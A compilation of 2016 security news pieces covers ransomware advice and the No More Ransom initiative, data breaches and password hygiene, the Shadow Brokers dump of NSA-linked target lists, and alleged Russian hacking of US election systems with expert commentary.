It’s never advisable to pay the ransom. In Q3 2016, @kaspersky web #antivirus detected 12,657,673 unique malicious objects #KLreport #netsec Tweet If you do find yourself in a situation where your files are encrypted and you don’t have a backup, ask your anti-malware vendor if they can help and check the No More Ransom website, to see if it holds the keys to decrypt your data.

This is a joint initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky Lab and Intel Security – designed to help victims of ransomware retrieve their encrypted data without paying cybercriminals. In a recent ‘ask the expert‘ session, Jornt van der Wiel, an expert from Kaspersky Lab’s Global Research and Analysis Team, provided useful insights into ransomware. Data breaches Personal information is a valuable commodity, so it’s no surprise that cybercriminals target online providers, looking for ways to bulk-steal data in a single attack. We’ve become accustomed to the steady stream of security breaches reported in the media.

This quarter has been no exception, with data leaks from the official forum of DotA 2, Yahoo and others. Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves.

Any organization that holds personal data has a duty of care to secure it effectively.

This includes hashing and salting customer passwords and encrypting other sensitive data. Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard.

As an alternative, people can use a password manager application to handle all this for them automatically. It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings. Given the potential impact of a security breach, it’s hardly surprising to see regulatory authorities paying closer attention to the issue.

The UK Information Commissioner’s Office (ICO) recently issued a record fine of £400,000 to Talk Talk for the company’s ‘failure to implement the most basic cyber security measures’, related to the attack on the company in October 2015.
In the view of the ICO, the record fine ‘acts as a warning to others that cyber security is not an IT issue, it is a boardroom issue’. The EU General Data Protection Regulation (GDPR), which comes into force in May 2018, will require companies to notify the regulator of data breaches, with significant fines for failure to secure personal data. You can find an overview of the regulation here. We took a look back at the impact of the Ashley Madison breach, one year after the attack that led to the leak of customer data, offering some good tips to anyone who might be considering looking online for love (and good advice for managing any online account).

Shadow Brokers dump reveals NSA targets

Accompanying gibberish encourages disrupting US election The Shadow Brokers hacking group has posted a fresh dump containing a list of servers compromised by an NSA-linked group. The list contains historic targets of the Equation Group. Mail providers, universities and targets in China make up the bulk of the roster.

Each were targets of INTONATION and PITCHIMPAIR, codenames for cyber-spy hacking programmes. Documents leaked by whistleblower Edward Snowden provide strong evidence that previous dumps by the Shadows Brokers feature malware and exploits that originated at the NSA, as previously reported.

The latest Shadow Brokers dump was signed using the same key as the initial dump of NSA exploits, which the Shadow Brokers unsuccessfully tried to auction off.

A message accompanying the latest dump somewhat incoherently calls for attempts to disrupt the forthcoming US presidential election. This poorly argued rabble-rousing has been met with some derision.
Security experts have questioned the value of the leaked target list, at least outside the realm of cyber-espionage historians. "The list of servers is nine years old. [Many] likely no longer exist or [are] reinstalled," said security researcher Kevin Beaumont, in an update on Twitter. ®

Democralypse Now? US election first battle in new age of cyberwarfare

CIA said to blame Russia for voter database hacks Hacking attempts against more than 10 US state election databases have increased fears about Russian efforts to disrupt or influence the 2016 presidential election. Cyberattacks against voting databases in Arizona, Illinois and at least eight other states have only heightened concerns in the wake of the hack and subsequent leak of emails from the Democratic National Congress. The US government has not shied from pointing the finger of blame firmly towards Moscow as previously reported.

The Russian government "directed the recent compromises of emails from US persons and institutions," the Department of Homeland Security and the Office of the Director of National Intelligence alleged earlier this month. US security agencies are publicly accusing Russia of trying to interfere with the election process after allegedly escalating from cyber-espionage to cyber-sabotage. Federal officials suspect Russian hackers tried to breach a contractor for Florida's election system, exposing voters' personal information in the process, CNN reports. Amid these heightened tensions, the CIA is reportedly preparing for cyberwar against Russia, or at least looking into scenarios for a conflict largely fought in the arena of public opinion, where leaks of sensitive information on rival political elites are the weapons of choice. Spin cycle Accusations are flying left, right, and centre as experts urge calm assessment and caution.

Tod Beardsley, senior research manager at Rapid7, likened attempts to hack the election system to the routine scanning and probing of corporate networks. “There is wide speculation around the current ‘probing’ activity directed at online voter registration sites,” he said. “In isolation, this might seem alarming. However, all online systems are ‘probed’ all the time.

Automated and routine vulnerability scans of internet assets is a normal part of online weather, is sourced from all over the world, and is well understood by experienced IT security practitioners.” Even if voter record databases were corrupted then the effect would be disruptive rather than disastrous, according to Beardsley. “If online voter registration records are vandalised on election day in order to deregister otherwise legitimate voters, polling places can and will fall back to the paper-based provisional balloting system guaranteed by the Help America Vote Act of 2002 (HAVA).
So, while an outage of voter registration records would certainly be inconvenient, it would not prevent the election from taking place.
It just wouldn't be worthwhile in terms of effort, cost, and risk to attack elections this way, given the ease of local recovery through provisional balloting." Vote early, vote often The presidential election is now only two weeks away and this has served to heighten speculation – present during every recent election cycle – over the possibility of someone "hacking the election". Hackers have been threatening to steal voting results data as well as voters’ personal information.

The MIT Technology Review concludes that “voter registration information” is more at risk than your ballot. Tim Erlin, senior director of product management at Tripwire, said the 2016 US presidential elections are the “first major election where foreign cyberattacks have been discussed as a material threat”, something he expects to become the norm. “There’s no more business as usual when it comes to cybersecurity and US elections,” Erlin said. “The United States is going to have to come to grips with a future where electronic interference in elections by foreign powers is standard operating procedure.” Even apparently minor problems in election systems need to be scrutinised closely. “The information security community has learned over and over that the first discovery of a breach never uncovers the full scope,” Erlin warned. “We should apply that lesson to any election related compromises as well.

There’s likely more to uncover here as well.” Robert McFarlane, head of labs at Head London, commented: “The levels of hysteria and hyperbole have been the highest of any US election in living memory, but it’s certainly not inconceivable that we could see some high-stakes hacking. However, I’d suggest the underlying reasons behind this would be geopolitical: these elections have made the US look weak on the global stage and Putin desperately needs to deflect from the Syrian campaign.

As such, a Russian-sponsored hack would serve to humiliate and destabilise an already shaky America. “Of course, it also doesn’t help that Trump’s babbling rhetoric actively appears to invite outside interference to help secure his victory – or at the very least call a defeat into question.

There are, clearly, a great many ways a hack could backfire on Trump, as well as the sponsor – whether that’s external or domestic.
In fact, being able to point the finger of blame at the Russian Federation (or any state they don’t like) would be a convenient win for the Yanks by further isolating the perpetrator as an aggressive opponent of democracy.” Democralypse Now? Rapid7’s Beardsley has published a detailed blog on the hacking threats facing the US election system here. The US election system is “massively complex” and “appears to embody the absolute worst practices when it comes to information security”, he writes. There are cleartext, internet-based entry points to the voting system.

There is an ageing installed base of voting machines running proprietary, closed-source code, produced by many vendors.

And there is a bizarrely distributed model of authority over the election, where no one actually has the power to enforce a common set of security standards. Despite this assessment, Beardsley is inclined to downplay the widely discussed hacking threat against voting machines. “It is possible that foreign hackers could infiltrate voting machine software, and therefore cause votes cast for one candidate to be counted for another,” Beardsley said. “However, such an attack is literally incredible.
Voting machines in the US are never [as far as we are aware] directly connected to the internet on Election Day, which means the attacker would need to get at the machines well before November 8, while the software is being written or loaded on to the machines. “While this sort of infiltration is possible, such a campaign would require formidable espionage assets, have a high risk of being detected before the election, and the effects would be noticeable in bizarrely inaccurate exit polling during and after the election.”®